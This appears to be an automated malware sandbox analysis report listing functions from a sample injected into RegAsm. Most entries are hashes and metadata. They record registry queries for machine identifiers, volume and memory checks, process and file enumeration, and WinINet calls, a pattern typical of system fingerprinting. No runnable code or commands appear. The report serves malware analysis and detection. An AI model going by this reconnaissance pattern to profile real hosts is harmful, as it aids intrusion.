                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FAF0C8B57005046FD208DB59EC96E2B73AEDBC2298B19403CF805C7352D6A19C14C625
                                                                                                                                                                                                                                                            Function 0041F8D3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119), ref: 0041F939
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Open
                                                                                                                                                                                                                                                            • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                                                                                                                                                                                                                                            • API String ID: 71445658-1200804856
                                                                                                                                                                                                                                                            • Opcode ID: 23afe71e29af5ec134437f7a5a39b17a456f09bf968b00ebcd2edf471ecba85c
                                                                                                                                                                                                                                                            • Instruction ID: afa0995c9104d54c0513139320a2a32bada2c33ac1025a4ee98fc1a0a3f950aa
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 23afe71e29af5ec134437f7a5a39b17a456f09bf968b00ebcd2edf471ecba85c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A9F046B5740104AFD218DF69DC96E3B379EEBC6258F08402CF90AD7352E6B0AC18C768
                                                                                                                                                                                                                                                            Function 0041EDD1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetVolumeInformationA.KERNEL32 ref: 0041EE12
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: InformationVolume
                                                                                                                                                                                                                                                            • String ID: C
                                                                                                                                                                                                                                                            • API String ID: 2039140958-1037565863
                                                                                                                                                                                                                                                            • Opcode ID: fba895a7c84f0ebd10d110c2fb366e73445ea8b94fce1f580e62eef5e5c9b4e0
                                                                                                                                                                                                                                                            • Instruction ID: 92e8b87a2725497af17e58081da3f9891e214a7b1a9627bcd9299335e7855597
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fba895a7c84f0ebd10d110c2fb366e73445ea8b94fce1f580e62eef5e5c9b4e0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F50171B1C483809FD300EF78DC9899ABBE5AFC5204F09D92DE49987321E674E695CB46
                                                                                                                                                                                                                                                            Function 00420499 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,MachineGuid,?,?,?,?), ref: 004204D3
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: QueryValue
                                                                                                                                                                                                                                                            • String ID: MachineGuid
                                                                                                                                                                                                                                                            • API String ID: 3660427363-4186287252
                                                                                                                                                                                                                                                            • Opcode ID: 559368afa54c67bf8fb2bce8fe083da36d837b0e58ab7d7ce205c408e4ef4464
                                                                                                                                                                                                                                                            • Instruction ID: 7bd19849ba9bfde11fb18e584a279c445fdcfc572076ffcf1604942d4b869d57
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 559368afa54c67bf8fb2bce8fe083da36d837b0e58ab7d7ce205c408e4ef4464
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C8F09637204114AFD314DB4AFCC4D9B77A8FB86214F04043DF6ADC3211E664A919C765
                                                                                                                                                                                                                                                            Function 0041F2FF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,?,?,?,?), ref: 0041F336
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: QueryValue
                                                                                                                                                                                                                                                            • String ID: CurrentBuildNumber
                                                                                                                                                                                                                                                            • API String ID: 3660427363-1022791448
                                                                                                                                                                                                                                                            • Opcode ID: b9f1d27b948a2cde859decee709fabe3fc3aaf7079ba9210fc7bef9a2106faad
                                                                                                                                                                                                                                                            • Instruction ID: 32cc7c2ada2b86104a3a49f668f9a4e07e20b2ad3b816f2a31f760a166775264
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9f1d27b948a2cde859decee709fabe3fc3aaf7079ba9210fc7bef9a2106faad
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C8F0A7BE6010006FC1049789EC85C5B73AAEBD52157184039F90DC6321D6A5AD15CB28
                                                                                                                                                                                                                                                            Function 0041FF59 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,DisplayName,00000000,?,?), ref: 0041FF9F
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: QueryValue
                                                                                                                                                                                                                                                            • String ID: DisplayName
                                                                                                                                                                                                                                                            • API String ID: 3660427363-3786665039
                                                                                                                                                                                                                                                            • Opcode ID: bc31a2ff1834048140c9dfee421bfaf7d1603ec0065aed378ec0e313bf8dafab
                                                                                                                                                                                                                                                            • Instruction ID: f5713496be0a026c6677b26d3adc6da17140d2fb9fb8e09341883e6bed890c7d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc31a2ff1834048140c9dfee421bfaf7d1603ec0065aed378ec0e313bf8dafab
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4DF09A75700101AFE3148B49DC81F2A73E8ABCA314F08442DF946D7391E6B8ED098BAA
                                                                                                                                                                                                                                                            Function 0041F1F3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,ProductName,00000000,00000000,?,?), ref: 0041F22B
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: QueryValue
                                                                                                                                                                                                                                                            • String ID: ProductName
                                                                                                                                                                                                                                                            • API String ID: 3660427363-3586724618
                                                                                                                                                                                                                                                            • Opcode ID: 297f8375b1038bb0d3d7efae8f7a8fb007ca2ae3d08dc7cd9e0f1bc1478d321a
                                                                                                                                                                                                                                                            • Instruction ID: d06dab5c00e1cd9b568c1344ba8a1129501a229b943713cdd63673397a6e7b0d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 297f8375b1038bb0d3d7efae8f7a8fb007ca2ae3d08dc7cd9e0f1bc1478d321a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1AF0ECB66400045FC608DB49EC52D7AB79DEBA5214B04003AF908C7321E5A17C158725
                                                                                                                                                                                                                                                            Function 0041F955 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,ProcessorNameString,?,?,?,?), ref: 0041F98C
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: QueryValue
                                                                                                                                                                                                                                                            • String ID: ProcessorNameString
                                                                                                                                                                                                                                                            • API String ID: 3660427363-2160769855
                                                                                                                                                                                                                                                            • Opcode ID: 31041bb49acb937d4b380fc0fc361d606422b0c06ebdfe4616e1dac201ad4636
                                                                                                                                                                                                                                                            • Instruction ID: 552663aaeae6f16054e1a020f72e43f719887551d2972acdf4c5440fe477a02d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31041bb49acb937d4b380fc0fc361d606422b0c06ebdfe4616e1dac201ad4636
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39E09B7B750104AFC108D74DFC41C67B39DEBD9115B04053AF949C3311D5657D19C664
                                                                                                                                                                                                                                                            Function 0041F1A8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119), ref: 0041F1DC
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Open
                                                                                                                                                                                                                                                            • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                                                                                            • API String ID: 71445658-2278330950
                                                                                                                                                                                                                                                            • Opcode ID: 476f3307aa02160a5b5e6049588745abe0e09f88a314fee225192767593139a3
                                                                                                                                                                                                                                                            • Instruction ID: f7d6863b10dd3ef7c86b8c37ee4a6ed4c782ebdb65dcfa4361654b1c1eeb25b1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 476f3307aa02160a5b5e6049588745abe0e09f88a314fee225192767593139a3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4FE04FB9B402156BD318DF1AFC52F227258FB52204F190028BD05D7263D69168248958
                                                                                                                                                                                                                                                            Function 004234CE Relevance: 3.0, APIs: 2, Instructions: 27processCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004234F0
                                                                                                                                                                                                                                                            • Process32First.KERNEL32(00000000), ref: 004234FD
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2353314856-0
                                                                                                                                                                                                                                                            • Opcode ID: d0aafe996ae6847ea86accd4ca33bdfc7634bf740571bcb37ff440368e241406
                                                                                                                                                                                                                                                            • Instruction ID: 227a4079254baf746a4b3145b4eccbe3d1c1d191b7d66606b6d4c0c46632bee1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d0aafe996ae6847ea86accd4ca33bdfc7634bf740571bcb37ff440368e241406
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C7E0DF74301205AFE7A0CB1DEC92F6632E8FBC6348F140038B508CB3C1DA20EC208769
                                                                                                                                                                                                                                                            Function 00428E2D Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DriveTypememset
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1397174798-0
                                                                                                                                                                                                                                                            • Opcode ID: b57d072800557abae0a5aa22fb6253ca5f3f77b3917338c5565a3f969117a767
                                                                                                                                                                                                                                                            • Instruction ID: 05f602f88df0723ab444c59d209778b1bca8aad3002b6ddd03543a7d9dd94d56
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b57d072800557abae0a5aa22fb6253ca5f3f77b3917338c5565a3f969117a767
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 86E0867DF402105BD700CB40DD85F9DB375BBE9301F244136E50497345D6B4A9114B44
                                                                                                                                                                                                                                                            Function 00410B38 Relevance: 1.6, APIs: 1, Instructions: 112fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindNextFileA.KERNEL32(?,?), ref: 00410C8F
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFindNext
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2029273394-0
                                                                                                                                                                                                                                                            • Opcode ID: e44fe60c8639863d2c315c246c48f04d5d8cfac3e492799677a20636737e1b07
                                                                                                                                                                                                                                                            • Instruction ID: 774cd959641f09b608a44bffdc7760c736467633c15014411cd55cc47401f3d7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e44fe60c8639863d2c315c246c48f04d5d8cfac3e492799677a20636737e1b07
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7641487A6001648FC704DFACEDD1A9973B5EF89604F040068EA06D3265EA34FF64CF8A
                                                                                                                                                                                                                                                            Function 00406456 Relevance: 1.6, APIs: 1, Instructions: 87networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 0040645F
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseHandleInternet
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1081599783-0
                                                                                                                                                                                                                                                            • Opcode ID: 40158c5ab2417085201f24fde967ff0cc09c5e4c72c79cbf072d1c60d5054019
                                                                                                                                                                                                                                                            • Instruction ID: 5e30dc2250b2b057e2b1b345e2aa25aa9d68eecf49c728a9819dea50d90d54a6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 40158c5ab2417085201f24fde967ff0cc09c5e4c72c79cbf072d1c60d5054019
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F31CDBBA010699FCB04DF9CEC91ADD77B4FF95614B140028E826E3365DA30AF15DB88
                                                                                                                                                                                                                                                            Function 00404468 Relevance: 1.6, APIs: 1, Instructions: 68networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004044FF
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CrackInternet
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1381609488-0
                                                                                                                                                                                                                                                            • Opcode ID: 8ca45ac23f5f80d14643078be58b4809d258a7f24a3690ed9c8315075ae20a95
                                                                                                                                                                                                                                                            • Instruction ID: 9197950a34bd4c976d15aab42ed2e9430d39523bc9f36c003b53b492bb8b4f1e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ca45ac23f5f80d14643078be58b4809d258a7f24a3690ed9c8315075ae20a95
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D1130B56101049FDB44EF6DEC82A6F77E8EB8A258B04403DE809C7311D738EE159B69
                                                                                                                                                                                                                                                            Function 004131B8 Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(?,?), ref: 00413298
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFindNext
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2029273394-0
                                                                                                                                                                                                                                                            • Opcode ID: 3a29d8ca63820d5722b582f667db8b337fae8528adca656499e5a846500da76d
                                                                                                                                                                                                                                                            • Instruction ID: 46ee3b8e51b98a700c03f76e3129104915c10ea7453c9402c637743a23bd37a1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a29d8ca63820d5722b582f667db8b337fae8528adca656499e5a846500da76d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FD2131B6A007099FC745CF68DC81BD9B3B1FF99304F048629D959D7211EB30BA68CB95
                                                                                                                                                                                                                                                            Function 00428AD8 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(?,?), ref: 00428B8D
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFindNext
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2029273394-0
                                                                                                                                                                                                                                                            • Opcode ID: cd3aa1e78e9bafe1509456a5680c28c2fd7ad0762637759b60c567d48fb9704d
                                                                                                                                                                                                                                                            • Instruction ID: f05d9e3c906a89cc39a28d3f1c3c1cdf9eccc8e36dd42beb386d9ba1c5efffb7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd3aa1e78e9bafe1509456a5680c28c2fd7ad0762637759b60c567d48fb9704d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B21D675E007598FEB51CF68D880AAABBF0BB48200F01856AD959E7311E734AA85CF94
                                                                                                                                                                                                                                                            Function 004281A3 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0002B95A,?,00000000,00000000), ref: 004281F4
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateThread
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2422867632-0
                                                                                                                                                                                                                                                            • Opcode ID: 9f766c61395a17931d0f1b18f2dfe0ebdacd91c9f8f739b9e91bdfc8bef2e541
                                                                                                                                                                                                                                                            • Instruction ID: 333401f703d56baabf777b19cb238a4d8652f21cbd007379918289329deaa6e8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f766c61395a17931d0f1b18f2dfe0ebdacd91c9f8f739b9e91bdfc8bef2e541
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD11A1B6340244AFD314DB5CECD1E6AB3E9EFC4209B190539E55AC3361DA34BE18CB28
                                                                                                                                                                                                                                                            Function 0040F621 Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(?,?), ref: 0040F6B3
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFindNext
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2029273394-0
                                                                                                                                                                                                                                                            • Opcode ID: a7703d518600a256b01e6be35bebfad8b62186e0db01ff4d5707e6f2c8d3ec17
                                                                                                                                                                                                                                                            • Instruction ID: f292f0bd4e0c0730813694860e680219b469247554fa056f98eb1f0cfd166385
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7703d518600a256b01e6be35bebfad8b62186e0db01ff4d5707e6f2c8d3ec17
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D011737A7402048BCB00DF9CDDC1BD973B6BF89314F044668A919DB356DA74EA68CB89
                                                                                                                                                                                                                                                            Function 0041FC37 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041FC8B
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: GlobalMemoryStatus
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1890195054-0
                                                                                                                                                                                                                                                            • Opcode ID: d67a27c9b99dd7a5bcb955ccc47490bdb7cbe0b4d5b421f5d9e7404f74ea9cfb
                                                                                                                                                                                                                                                            • Instruction ID: 567a26385f976fdb7e9c64f1dd9d30ac251e2d642bf6d4e3b564833a4be22e49
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d67a27c9b99dd7a5bcb955ccc47490bdb7cbe0b4d5b421f5d9e7404f74ea9cfb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2F0F0B66002006FD324EF2DDC81E5B7BA8EBCA714F00413CB25AD3390DA34A904C769
                                                                                                                                                                                                                                                            Function 00407189 Relevance: 1.5, APIs: 1, Instructions: 37networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00407197
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseHandleInternet
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1081599783-0
                                                                                                                                                                                                                                                            • Opcode ID: 9d7e6391d205012e130f3f3ea228e23d68f5f77aea07e94926cd98718c3223a4
                                                                                                                                                                                                                                                            • Instruction ID: 3adff67efb32840669713f8a0c5f684ed6112579c969e8e8afcce97dc2c94f89
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d7e6391d205012e130f3f3ea228e23d68f5f77aea07e94926cd98718c3223a4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 97018CB6A001449FCF04CB98DC90F9E73B9EFC9340B144024E819F7711D639AE018BA4
                                                                                                                                                                                                                                                            Function 0041E72C Relevance: 1.5, APIs: 1, Instructions: 37memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 0041E772
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
